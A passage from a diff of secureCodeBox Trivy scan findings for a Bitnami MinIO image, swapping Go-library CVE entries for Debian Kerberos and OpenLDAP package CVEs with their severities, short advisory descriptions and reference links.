"https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2835", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2835", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", - "https://github.com/advisories/GHSA-ch7v-37xg-75ph", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", - "https://www.cve.org/CVERecord?id=CVE-2022-2835", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreDNS: DNS Redirection of Internal Services", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2835", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2835", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2837", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2837", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", - "https://github.com/advisories/GHSA-h828-v5pv-33qx", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", - "https://www.cve.org/CVERecord?id=CVE-2022-2837", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "DNS Redirection of Top-Level Domains", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2837", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2837", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.2.26", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "GHSA-rm8v-mxj3-5rmq", - "installedVersion": "v1.2.19", - "packageName": "github.com/lestrrat-go/jwx", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", - "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", - "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", - "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", - "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", - "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.28.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-33955", - "installedVersion": "v0.20.0", - "packageName": "github.com/minio/console", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2953", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://github.com/advisories/GHSA-jv3f-7m33-qp65", - "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", - "https://github.com/minio/console/releases/tag/v0.28.0", - "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", - "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "https://access.redhat.com/security/cve/CVE-2023-2953", + "https://bugs.openldap.org/show_bug.cgi?id=9904", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "https://www.cve.org/CVERecord?id=CVE-2023-2953", ], }, "category": "Vulnerability", - "description": "Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. - -", + "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "name": "null pointer dereference in ber_memalloc_x function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-33955", + "value": "https://avd.aquasec.com/nvd/cve-2023-2953", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://access.redhat.com/security/cve/CVE-2023-2953", }, { "type": "URL", - "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", }, { "type": "URL", - "value": "https://github.com/minio/console/releases/tag/v0.28.0", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", }, { "type": "URL", - "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2015-3276", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "http://www.securitytracker.com/id/1034221", + "https://access.redhat.com/security/cve/CVE-2015-3276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "https://linux.oracle.com/cve/CVE-2015-3276.html", + "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "https://www.cve.org/CVERecord?id=CVE-2015-3276", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "incorrect multi-keyword mode cipherstring parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://avd.aquasec.com/nvd/cve-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "http://www.securitytracker.com/id/1034221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://access.redhat.com/security/cve/CVE-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-14159", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://www.openldap.org/its/index.cgi?findid=8703", + "https://access.redhat.com/security/cve/CVE-2017-14159", + "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Privilege escalation via PID file manipulation", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://avd.aquasec.com/nvd/cve-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "http://www.openldap.org/its/index.cgi?findid=8703", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://access.redhat.com/security/cve/CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-17740", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "https://access.redhat.com/security/cve/CVE-2017-17740", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + 